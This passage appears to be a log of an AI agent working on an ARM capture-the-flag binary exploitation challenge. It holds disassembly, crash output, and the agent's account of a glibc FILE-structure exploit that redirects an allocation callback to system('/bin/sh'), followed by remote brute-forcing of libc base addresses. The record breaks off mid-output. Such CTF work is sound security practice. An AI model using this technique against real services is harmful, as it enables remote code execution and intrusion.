49ed 0400 21e4 0400 81de 0400 b502 0500 I...!........... 0x000f2c00 f9de 0400 d1dd 0400 3d60 0400 39ed 0400 ........=`..9... 0x000f2c10 5de9 0400 05e2 0400 d5de 0400 51e9 0400 ]...........Q... 0x000f2c20 cd0d 0500 d50d 0500 0000 0000 0000 0000 ................ 0x000f2c30 2911 0500 d10e 0500 950e 0500 9d00 0500 )............... 0x000f2c40 1111 0500 d900 0500 b101 0500 d111 0500 ................ 0x000f2c50 b502 0500 1502 0500 4104 0500 f902 0500 ........A....... 0x000f2c60 c10d 0500 c90d 0500 ad0d 0500 4104 0500 ............A... 0x000f2c70 b90d 0500 cd0d 0500 d50d 0500 0000 0000 ................ 0x000f2c80 0000 0000 2911 0500 312a 0a00 950e 0500 ....)...1*...... 0x000f2c90 9d00 0500 1111 0500 d900 0500 b101 0500 ................ 0x000f2ca0 d111 0500 b502 0500 1502 0500 4104 0500 ............A... 0x000f2cb0 f902 0500 c10d 0500 c90d 0500 ad0d 0500 ................ 0x000f2cc0 4104 0500 b90d 0500 cd0d 0500 d50d 0500 A............... 0x000f2cd0 d02c 0f00 fc4e 0c00 2c4e 0c00 b04b 0c00 .,...N..,N...K.. 0x000f2ce0 5450 0c00 444e 0c00 9c4b 0c00 0000 0000 TP..DN...K...... 0x000f2cf0 904b 0c00 744b 0c00 404b 0c00 9c4b 0c00 .K..tK..@K...K.. - **Assistant:** ERROR: Cannot find function at 0x00050ed1 - **Assistant:** WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time INFO: Analyze all flags starting with sym. and entry0 (aa) INFO: Analyze imports (af@@@i) INFO: Analyze entrypoint (af@ entry0) INFO: Analyze symbols (af@@@s) WARN: Limiting jump table at 0x000ab910 to 512 cases WARN: Limiting jump table at 0x000ab7ea to 512 cases INFO: Running plugin pre-analysis hooks INFO: Analyze all functions arguments/locals (afva@@F) INFO: Analyze function calls (aac) INFO: Analyze len bytes of instructions for references (aar) INFO: Finding and parsing C++ vtables (avrr) INFO: Analyzing methods (af @@ method.*) INFO: Emulate functions to find computed references (aaef) INFO: Recovering local variables (afva@@@F) INFO: Type matching analysis for all functions (aaft) INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 ; CALL XREF from sym.getchar @ +0x12e(x) ┌ 238: sym._IO_str_overflow (int16_t arg1, uint32_t arg2); │ `- args(r0, r1) │ 0x00050ed0 0268 ldr r2, [r0] ; arg1 │ 0x00050ed2 1307 lsls r3, r2, 0x1c │ ┌─< 0x00050ed4 04d5 bpl 0x50ee0 │ │ 0x00050ed6 481c adds r0, r1, 1 ; arg2 │ │ 0x00050ed8 18bf it ne │ │ 0x00050eda 4ff0ff30 mov.w r0, -1 │ │ 0x00050ede 7047 bx lr │ │ ; CODE XREF from sym._IO_str_overflow @ 0x50ed4(x) │ └─> 0x00050ee0 02f44063 and r3, r2, 0xc00 │ 0x00050ee4 b3f5806f cmp.w r3, 0x400 │ 0x00050ee8 2de9f047 push.w {r4, r5, r6, r7, r8, sb, sl, lr} │ 0x00050eec 04bf itt eq │ 0x00050eee 42f40062 orreq r2, r2, 0x800 │ 0x00050ef2 4368 ldr r3, [r0, 4] ; arg1 │ 0x00050ef4 0d46 mov r5, r1 ; arg2 │ 0x00050ef6 08bf it eq │ ; DATA XREF from sym.gethostbyname_r @ 0xa5740(r) │ 0x00050ef8 8468 ldr r4, [r0, 8] ; arg1 │ 0x00050efa d0e90776 ldrd r7, r6, [r0, 0x1c] ; arg1 │ 0x00050efe 14bf ite ne │ 0x00050f00 4369 ldreq r3, [r0, 0x14] ; arg1 │ 0x00050f02 0260 str r2, [r0] ; arg1 │ 0x00050f04 a6eb0706 sub.w r6, r6, r7 │ 0x00050f08 0269 ldr r2, [r0, 0x10] ; arg1 │ 0x00050f0a 08bf it eq │ 0x00050f0c 4460 str r4, [r0, 4] ; arg1 │ 0x00050f0e 0446 mov r4, r0 ; arg1 │ ; DATA XREF from sym._IO_flush_all_linebuffered @ +0x1fc(r) │ 0x00050f10 08bf it eq │ 0x00050f12 4361 str r3, [r0, 0x14] ; arg1 │ 0x00050f14 9a1a subs r2, r3, r2 │ 0x00050f16 b1f1ff3f cmp.w r1, -1 ; arg2 │ 0x00050f1a 14bf ite ne │ 0x00050f1c 3146 moveq r1, r6 │ 0x00050f1e 711c adds r1, r6, 1 │ 0x00050f20 9142 cmp r1, r2 │ ┌─< 0x00050f22 3cd8 bhi 0x50f9e │ │ 0x00050f24 0368 ldr r3, [r0] ; arg1 │ │ 0x00050f26 13f0010a ands sl, r3, 1 │ │ ; DATA XREF from fcn.00088ca0 @ 0x88d02(r) │ ┌──< 0x00050f2a 45d1 bne 0x50fb8 │ ││ 0x00050f2c 06f13209 add.w sb, r6, 0x32 │ ││ 0x00050f30 4fea4909 lsl.w sb, sb, 1 │ ││ 0x00050f34 4e45 cmp r6, sb │ ┌───< 0x00050f36 3fd8 bhi 0x50fb8 │ │││ 0x00050f38 d0f8a030 ldr.w r3, [r0, 0xa0] ; arg1 │ │││ 0x00050f3c 4846 mov r0, sb │ │││ 0x00050f3e 9847 blx r3 │ │││ 0x00050f40 8046 mov r8, r0 │ │││ 0x00050f42 0028 cmp r0, 0 │ │││ ; DATA XREF from sym._IO_flush_all_linebuffered @ +0x1f8(r) │ ┌────< 0x00050f44 38d0 beq 0x50fb8 │ ┌─────< 0x00050f46 4fb1 cbz r7, 0x50f5c │ │││││ 0x00050f48 3246 mov r2, r6 │ │││││ 0x00050f4a 3946 mov r1, r7 │ │││││ 0x00050f4c c5f7f8ee blx fcn.00016d40 │ │││││ 0x00050f50 d4f8a430 ldr.w r3, [r4, 0xa4] │ │││││ 0x00050f54 3846 mov r0, r7 │ │││││ 0x00050f56 9847 blx r3 │ │││││ 0x00050f58 c4f81ca0 str.w sl, [r4, 0x1c] │ │││││ ; CODE XREF from sym._IO_str_overflow @ 0x50f46(x) │ └─────> 0x00050f5c a9eb0602 sub.w r2, sb, r6 ; size_t n │ ││││ 0x00050f60 08eb0600 add.w r0, r8, r6 ; void *s │ ││││ 0x00050f64 0021 movs r1, 0 ; int c │ ││││ 0x00050f66 08f044ea blx sym.memset ; void *memset(void *s, int c, size_t n) │ ││││ 0x00050f6a 08eb0902 add.w r2, r8, sb ; int16_t arg3 │ ││││ 0x00050f6e 0123 movs r3, 1 ; int16_t arg4 │ ││││ 0x00050f70 4146 mov r1, r8 ; int16_t arg2 │ ││││ 0x00050f72 2046 mov r0, r4 ; int16_t arg1 │ ││││ 0x00050f74 fff734f8 bl sym._IO_setb │ ││││ 0x00050f78 211d adds r1, r4, 4 │ ││││ 0x00050f7a 0ec9 ldm r1, {r1, r2, r3} │ ││││ 0x00050f7c c4f81080 str.w r8, [r4, 0x10] │ ││││ 0x00050f80 de1b subs r6, r3, r7 │ ││││ 0x00050f82 c81b subs r0, r1, r7 │ ││││ 0x00050f84 6369 ldr r3, [r4, 0x14] │ ││││ 0x00050f86 d21b subs r2, r2, r7 │ ││││ 0x00050f88 216a ldr r1, [r4, 0x20] │ ││││ 0x00050f8a 4644 add r6, r8 │ ││││ 0x00050f8c db1b subs r3, r3, r7 │ ││││ 0x00050f8e 4044 add r0, r8 │ ││││ 0x00050f90 4244 add r2, r8 │ ││││ 0x00050f92 4344 add r3, r8 │ ││││ 0x00050f94 e660 str r6, [r4, 0xc] │ ││││ 0x00050f96 6060 str r0, [r4, 4] │ ││││ 0x00050f98 a260 str r2, [r4, 8] │ ││││ 0x00050f9a c4e90531 strd r3, r1, [r4, 0x14] │ ││││ ; CODE XREF from sym._IO_str_overflow @ 0x50f22(x) │ │││└─> 0x00050f9e 6a1c adds r2, r5, 1 │ │││ 0x00050fa0 2846 mov r0, r5 │ │││ 0x00050fa2 1fbf itttt ne │ │││ 0x00050fa4 5a1c addne r2, r3, 1 │ │││ 0x00050fa6 6261 strne r2, [r4, 0x14] │ │││ 0x00050fa8 1d70 strb r5, [r3] │ │││ 0x00050faa 6369 ldr r3, [r4, 0x14] │ │││ 0x00050fac a268 ldr r2, [r4, 8] │ │││ 0x00050fae 9a42 cmp r2, r3 │ │││ 0x00050fb0 38bf it lo │ │││ 0x00050fb2 a360 str r3, [r4, 8] │ │││ ; CODE XREF from sym._IO_str_overflow @ 0x50fbc(x) │ │││┌─> 0x00050fb4 bde8f087 pop.w {r4, r5, r6, r7, r8, sb, sl, pc} │ │││╎ ; CODE XREFS from sym._IO_str_overflow @ 0x50f2a(x), 0x50f36(x), 0x50f44(x) │ └└└──> 0x00050fb8 4ff0ff30 mov.w r0, -1 │ │ ; DATA XREF from sym._IO_list_lock @ 0x50df8(r) └ └─< 0x00050fbc fae7 b 0x50fb4 0x00050fbe 00bf nop ; CALL XREFS from sym._IO_str_seekoff @ 0x51354(x), 0x5139c(x) ┌ 322: fcn.00050fc0 (int16_t arg1, uint32_t arg2, int16_t arg3, int16_t arg4, int16_t c); │ `- args(r0, r1, r2, r3) vars(1:sp[0x2c..0x2c]) │ 0x00050fc0 2de9f04f push.w {r4, r5, r6, r7, r8, sb, sl, fp, lr} │ 0x00050fc4 83b0 sub sp, 0xc │ 0x00050fc6 d0e90781 ldrd r8, r1, [r0, 0x1c] ; arg1 │ 0x00050fca a1eb0801 sub.w r1, r1, r8 ; arg2 │ 0x00050fce 9142 cmp r1, r2 ; arg3 │ 0x00050fd0 5ada bge 0x51088 │ 0x00050fd2 0568 ldr r5, [r0] ; arg1 │ 0x00050fd4 0169 ldr r1, [r0, 0x10] ; arg1 │ 0x00050fd6 15f00105 ands r5, r5, 1 │ 0x00050fda d0f818a0 ldr.w sl, [r0, 0x18] ; arg1 │ 0x00050fde 0191 str r1, [var_4h] │ 0x00050fe0 40f08180 bne.w 0x510e6 │ 0x00050fe4 02f1640b add.w fp, r2, 0x64 ; arg3 │ 0x00050fe8 1f46 mov r7, r3 ; arg4 │ 0x00050fea 0446 mov r4, r0 │ 0x00050fec d0f8a030 ldr.w r3, [r0, 0xa0] │ 0x00050ff0 5846 mov r0, fp │ 0x00050ff2 1646 mov r6, r2 │ ; DATA XREF from sym._IO_list_resetlock @ +0x10(r) │ 0x00050ff4 9847 blx r3 │ 0x00050ff6 8146 mov sb, r0 │ 0x00050ff8 0028 cmp r0, 0 │ 0x00050ffa 74d0 beq 0x510e6 │ 0x00050ffc b8f1000f cmp.w r8, 0 │ 0x00051000 0ad0 beq 0x51018 - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: qemu: uncaught target signal 11 (Segmentation fault) - core dumped - **Assistant:** /bin/bash: line 1: 772 Segmentation fault (core dumped) qemu-arm -g 1240 -L /metadata/armsys /challenge/speed1 < /metadata/fsop_sh.bin - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: qemu: uncaught target signal 11 (Segmentation fault) - core dumped - **Assistant:** /bin/bash: line 1: 787 Segmentation fault (core dumped) qemu-arm -g 1241 -L /metadata/armsys /challenge/speed1 < /metadata/fsop_sh.bin - **Assistant:** The local exploit now works without touching the stack canary: a first line beginning with `0` overflows the copied `stdout` pointer to a fake ARM glibc `_IO_str_jumps` FILE object. The final `printf` calls `_IO_str_overflow`, whose allocation callback I point at `system`, with the computed allocation size equal to the libc `"/bin/sh"` address. - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ - **Assistant:** The one-shot works locally, but the first remote attempt did not print command output, which points to a libc load-base mismatch between my local sysroot run and the service wrapper. I’m probing the two qemu layouts I observed locally and will use the one that produces shell output. - **Assistant:** BASE 0x40804000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40810000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x4083a000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x407f0000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x407e0000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40800000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40820000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40830000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40840000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' - **Assistant:** send_immediate len 2385 has num True tail b'\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nnum: \x1b[1mres:\x1b[0m 0\n' wait_prompt pre len 2369 has num True wait_prompt len 16 has num False tail b' \x1b[1mres:\x1b[0m 0\n' - **Assistant:** BASE 0x4083a000 len 2536 mark False tail b'5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nnum: Fatal error: glibc detected an invalid stdio handle\n/home/ctf/run.sh: line 2: 1381413 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' BASE 0x40804000 len 2536 mark False tail b'5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nnum: Fatal error: glibc detected an invalid stdio handle\n/home/ctf/run.sh: line 2: 1381419 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' BASE 0x40810000 len 2536 mark False tail b'5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nnum: Fatal error: glibc detected an invalid stdio handle\n/home/ctf/run.sh: line 2: 1381422 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** The remote wrapper is using a different ARM libc mapping than my local reproduction, so the valid `_IO_str_jumps` address is shifted. I’m scanning a narrow qemu-user mapping window for the page where glibc accepts the fake vtable; the signal is simple: wrong pages abort with “invalid stdio handle,” the right page reaches the `system` callback. - **Assistant:** CAND 0x40803000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x4081c000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x4085c000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x40863000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x40882000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x40885000 len 2364 ok False invalid False tail b' 